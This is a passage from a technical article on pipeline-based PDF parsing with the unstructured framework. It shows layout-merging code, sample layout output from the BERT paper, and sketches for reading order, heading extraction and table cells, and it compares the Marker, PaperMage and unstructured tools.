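) -> List[Rect]:
    merged = list(inferred)
    for ext in extracted:
        # Keep an extracted region only if no inferred region matches it.
        if all(iou(ext, inf) < same_region_threshold for inf in inferred):
            merged.append(ext)
    return merged


inferred = [(0, 0, 100, 100)]
extracted = [(0, 0, 100, 98), (200, 200, 300, 300)]
print(merge_layouts(inferred, extracted))
```

The real implementation distinguishes more cases, such as one region being a subregion of another, and it also decides which source supplies the text for a matched region.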

About Customization

Unstructured exposes many intermediate results that are easy to customize.

In the previous article, we discussed three problems with the data produced by unstructured:

Table parsing
Reordering the detected blocks, especially in two-column PDFs
Extracting multi-level headings

The last two problems can be solved by modifying the intermediate structure. As an example, Figure 11 shows the final layout of the second page of the BERT paper.

Figure 11: Visualization of the final layout of the second page of the BERT paper. Screenshot by the author.

At the same time, we can easily obtain the corresponding layout analysis results:

[


LayoutElement(bbox=Rectangle(x1=851.1539916992188, y1=181.15073777777613, x2=1467.844970703125, y2=587.8204599999975), text='These approaches have been generalized to coarser granularities, such as sentence embed- dings (Kiros et al., 2015; Logeswaran and Lee, 2018) or paragraph embeddings (Le and Mikolov, 2014). To train sentence representations, prior work has used objectives to rank candidate next sentences (Jernite et al., 2017; Logeswaran and Lee, 2018), left-to-right generation of next sen- tence words given a representation of the previous sentence (Kiros et al., 2015), or denoising auto- encoder derived objectives (Hill et al., 2016). ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.9519357085227966, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=196.5296173095703, y1=181.1507377777777, x2=815.468994140625, y2=512.548237777777), text='word based only on its context. Unlike left-to- right language model pre-training, the MLM ob- jective enables the representation to fuse the left and the right context, which allows us to pre- In addi- train a deep bidirectional Transformer. tion to the masked language model, we also use a “next sentence prediction” task that jointly pre- trains text-pair representations. The contributions of our paper are as follows: ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.9517233967781067, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=200.22352600097656, y1=539.1451822222216, x2=825.0242919921875, y2=870.542682222221), text='• We demonstrate the importance of bidirectional pre-training for language representations. Un- like Radford et al. (2018), which uses unidirec- tional language models for pre-training, BERT uses masked language models to enable pre- trained deep bidirectional representations. This is also in contrast to Peters et al. (2018a), which uses a shallow concatenation of independently trained left-to-right and right-to-left LMs. ', source=<Source.YOLOX: 'yolox'>, type='List-item', prob=0.9414362907409668, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=851.8727416992188, y1=599.8257377777753, x2=1468.0499267578125, y2=1420.4982377777742), text='ELMo and its predecessor (Peters et al., 2017, 2018a) generalize traditional word embedding re- search along a different dimension. They extract context-sensitive features from a left-to-right and a right-to-left language model. The contextual rep- resentation of each token is the concatenation of the left-to-right and right-to-left representations. When integrating contextual word embeddings with existing task-speciﬁc architectures, ELMo advances the state of the art for several major NLP benchmarks (Peters et al., 2018a) including ques- tion answering (Rajpurkar et al., 2016), sentiment analysis (Socher et al., 2013), and named entity recognition (Tjong Kim Sang and De Meulder, 2003). Melamud et al. (2016) proposed learning contextual representations through a task to pre- dict a single word from both left and right context using LSTMs. Similar to ELMo, their model is feature-based and not deeply bidirectional. Fedus et al. (2018) shows that the cloze task can be used to improve the robustness of text generation mod- els. ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.938507616519928, image_path=None, parent=None), 




LayoutElement(bbox=Rectangle(x1=199.3734130859375, y1=900.5257377777765, x2=824.69873046875, y2=1156.648237777776), text='• We show that pre-trained representations reduce the need for many heavily-engineered task- speciﬁc architectures. BERT is the ﬁrst ﬁne- tuning based representation model that achieves state-of-the-art performance on a large suite of sentence-level and token-level tasks, outper- forming many task-speciﬁc architectures. ', source=<Source.YOLOX: 'yolox'>, type='List-item', prob=0.9461237788200378, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=195.5695343017578, y1=1185.526123046875, x2=815.9393920898438, y2=1330.3272705078125), text='• BERT advances the state of the art for eleven NLP tasks. The code and pre-trained mod- els are available at https://github.com/ google-research/bert. ', source=<Source.YOLOX: 'yolox'>, type='List-item', prob=0.9213815927505493, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=195.33956909179688, y1=1360.7886962890625, x2=447.47264000000007, y2=1397.038330078125), text='2 Related Work ', source=<Source.YOLOX: 'yolox'>, type='Section-header', prob=0.8663332462310791, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=197.7477264404297, y1=1419.3353271484375, x2=817.3308715820312, y2=1527.54443359375), text='There is a long history of pre-training general lan- guage representations, and we brieﬂy review the most widely-used approaches in this section. ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.928022563457489, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=851.0028686523438, y1=1468.341394166663, x2=1420.4693603515625, y2=1498.6444497222187), text='2.2 Unsupervised Fine-tuning Approaches ', source=<Source.YOLOX: 'yolox'>, type='Section-header', prob=0.8346447348594666, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=853.5444444444446, y1=1526.3701822222185, x2=1470.989990234375, y2=1669.5843488888852), text='As with the feature-based approaches, the ﬁrst works in this direction only pre-trained word em- (Col- bedding parameters from unlabeled text lobert and Weston, 2008). ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.9344717860221863, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=200.00000000000009, y1=1556.2037353515625, x2=799.1743774414062, y2=1588.031982421875), text='2.1 Unsupervised Feature-based Approaches ', source=<Source.YOLOX: 'yolox'>, type='Section-header', prob=0.8317819237709045, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=198.64227294921875, y1=1606.3146266666645, x2=815.2886352539062, y2=2125.895459999998), text='Learning widely applicable representations of words has been an active area of research for decades, including non-neural (Brown et al., 1992; Ando and Zhang, 2005; Blitzer et al., 2006) and neural (Mikolov et al., 2013; Pennington et al., 2014) methods. Pre-trained word embeddings are an integral part of modern NLP systems, of- fering signiﬁcant improvements over embeddings learned from scratch (Turian et al., 2010). To pre- train word embedding vectors, left-to-right lan- guage modeling objectives have been used (Mnih and Hinton, 2009), as well as objectives to dis- criminate correct from incorrect words in left and right context (Mikolov et al., 2013). ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.9450697302818298, image_path=None, parent=None), 


LayoutElement(bbox=Rectangle(x1=853.4905395507812, y1=1681.5868488888855, x2=1467.8729248046875, y2=2125.8954599999965), text='More recently, sentence or document encoders which produce contextual token representations have been pre-trained from unlabeled text and ﬁne-tuned for a supervised downstream task (Dai and Le, 2015; Howard and Ruder, 2018; Radford et al., 2018). The advantage of these approaches is that few parameters need to be learned from scratch. At least partly due to this advantage, OpenAI GPT (Radford et al., 2018) achieved pre- viously state-of-the-art results on many sentence- level tasks from the GLUE benchmark (Wang language model- Left-to-right et al., 2018a). ', source=<Source.YOLOX: 'yolox'>, type='Text', prob=0.9476840496063232, image_path=None, parent=None)


]

Using the information above, we can easily perform tasks such as sorting elements and extracting multi-level headings.

Therefore, when developing our own PDF parsing tools, we should strive to preserve as much useful intermediate information and metadata as possible.
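To make the sorting and heading extraction mentioned above concrete, here is a minimal sketch. It does not use the unstructured API: the `Element` class is a hypothetical stand-in for a layout element, the coordinates are rounded from the output above, and both the page width of 1700 and the split of a two-column page at its horizontal midpoint are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass
class Element:
    """Hypothetical stand-in for a layout element: bounding box, text, type."""
    x1: float
    y1: float
    x2: float
    y2: float
    text: str
    type: str


def reading_order(elements, page_width):
    """Sort elements column by column, then top to bottom within a column.

    Assumes a two-column page split at the horizontal midpoint.
    """
    def key(el):
        center_x = (el.x1 + el.x2) / 2
        column = 0 if center_x < page_width / 2 else 1
        return (column, el.y1)

    return sorted(elements, key=key)


# A numbered heading such as "2.1 Title": the numbering depth gives the level.
NUMBERING = re.compile(r"^(\d+(?:\.\d+)*)\s+(.*)")


def extract_headings(elements):
    """Return (level, number, title) for every numbered section header."""
    headings = []
    for el in elements:
        if el.type != "Section-header":
            continue
        match = NUMBERING.match(el.text.strip())
        if match:
            number, title = match.groups()
            headings.append((number.count(".") + 1, number, title))
    return headings


# Coordinates rounded from the output above; page_width=1700 is an assumption.
elements = [
    Element(851.0, 1468.3, 1420.5, 1498.6,
            "2.2 Unsupervised Fine-tuning Approaches ", "Section-header"),
    Element(195.3, 1360.8, 447.5, 1397.0, "2 Related Work ", "Section-header"),
    Element(197.7, 1419.3, 817.3, 1527.5,
            "There is a long history of pre-training ...", "Text"),
    Element(200.0, 1556.2, 799.2, 1588.0,
            "2.1 Unsupervised Feature-based Approaches ", "Section-header"),
]

ordered = reading_order(elements, page_width=1700)
headings = extract_headings(ordered)
for level, number, title in headings:
    print("  " * (level - 1) + f"{number} {title}")
```

Because the bounding boxes and element types were kept, the headings come out in reading order with their nesting level, even though the detector listed section 2.2 before section 2.1.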

On table detection and recognition

The unstructured framework uses Table Transformer for table detection and recognition.

The Table Transformer model was proposed in the paper PubTables-1M: Towards comprehensive table extraction from unstructured documents. The paper introduces PubTables-1M, a new dataset for extracting tables from unstructured documents, as well as for table structure recognition and functional analysis, as shown in Figure 12.

Figure 12: Illustration of the three table extraction subtasks addressed by the PubTables-1M dataset. Source: PubTables-1M: Towards comprehensive table extraction from unstructured documents.

Table Transformer is a DETR-based model trained on the PubTables-1M dataset for tasks such as table detection and table structure recognition.
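Since a DETR-style structure recognition model returns table rows and columns as detected boxes, the cell grid still has to be assembled afterwards. The sketch below shows one common way to do that, by intersecting every row box with every column box. It is an illustration under stated assumptions, not code from unstructured or from the Table Transformer repository; the function name and the coordinates are made up.

```python
from typing import List, Tuple

Box = Tuple[float, float, float, float]  # (x1, y1, x2, y2)


def cells_from_rows_and_columns(rows: List[Box], columns: List[Box]) -> List[List[Box]]:
    """Build a grid of cell boxes by intersecting each row with each column."""
    rows = sorted(rows, key=lambda box: box[1])        # top to bottom
    columns = sorted(columns, key=lambda box: box[0])  # left to right
    grid = []
    for row in rows:
        grid.append([
            (
                max(row[0], col[0]),  # left edge of the overlap
                max(row[1], col[1]),  # top edge of the overlap
                min(row[2], col[2]),  # right edge of the overlap
                min(row[3], col[3]),  # bottom edge of the overlap
            )
            for col in columns
        ])
    return grid


# Hypothetical detections for a table with 2 rows and 3 columns,
# deliberately given out of order.
rows = [(0, 30, 300, 60), (0, 0, 300, 30)]
columns = [(200, 0, 300, 60), (0, 0, 100, 60), (100, 0, 200, 60)]

grid = cells_from_rows_and_columns(rows, columns)
for row_cells in grid:
    print(row_cells)
```

Each cell box can then be matched against OCR or embedded text boxes to fill the table with content.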

You can find more information on table processing in my previous article.

On formula detection and recognition

The unstructured framework has no dedicated module for formula detection and recognition, which shows in the mediocre results in Figure 13.

Figure 13: Left: the parsing result for a paragraph on page 6 of the BERT paper, including a formula highlighted with a red box. Right: the original paper. Screenshot by the author.

Conclusion

This article gave an overview of the pipeline approach to PDF parsing. It examined the approach through three frameworks that use it, walked through each of them in detail, and set out the conclusions drawn from them.

To sum up:

Although Marker has several drawbacks, it is a lightweight and fast tool.
Although PaperMage is designed primarily for scientific documents, its excellent scalability makes it a good starting point for further development.
Unstructured is a comprehensive pipeline framework for PDF parsing. Its strengths are detailed layout analysis and extensive customization options.

Overall, the pipeline approach to PDF parsing is easy to interpret and customize, which makes it a widely used method. However, its effectiveness depends heavily on the performance of each model or algorithm in the pipeline. The training data and architecture of each model should therefore be designed carefully.

This material was prepared as part of the practical online course "MLOps".

Category: News

Date: August 14, 2024

